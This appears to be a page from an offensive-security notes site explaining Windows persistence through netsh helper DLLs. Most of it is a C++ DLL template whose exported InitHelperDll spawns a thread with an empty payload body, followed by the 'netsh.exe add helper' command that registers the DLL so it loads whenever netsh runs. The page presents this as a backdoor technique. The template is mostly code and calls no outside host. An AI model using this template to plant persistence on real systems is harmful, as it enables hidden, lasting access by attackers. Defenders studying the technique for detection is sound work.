Netsh Dlls

Netsh allows for persistence due to the fact that it allows you to add a helper Dll. This helper dll that will get loaded whenever the netsh binary is run.

Our Netsh Dll code follows this template

#include <stdio.h>
#include <windows.h>
 
DWORD WINAPI YahSure(LPVOID lpParameter)
{
    // implement code 
 
}
 
//Custom netsh helper format
extern "C" __declspec(dllexport) DWORD InitHelperDll(DWORD dwNetshVersion, PVOID pReserved)
{
    HANDLE hand;
    hand = CreateThread(NULL, 0, YahSure, NULL, 0, NULL);
    CloseHandle(hand);
 
    return NO_ERROR;
}

BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved ) {

	switch ( fdwReason ) {
		case DLL_PROCESS_ATTACH:
						break;
		case DLL_THREAD_ATTACH:
						break;
		case DLL_THREAD_DETACH:
						break;
		case DLL_PROCESS_DETACH:
						break;
		}
	return TRUE;
}

To add this registry key:

netsh.exe add helper c:\helper.dll

PreviousWinLogon NextRDP Backdoors

Last updated 3 years ago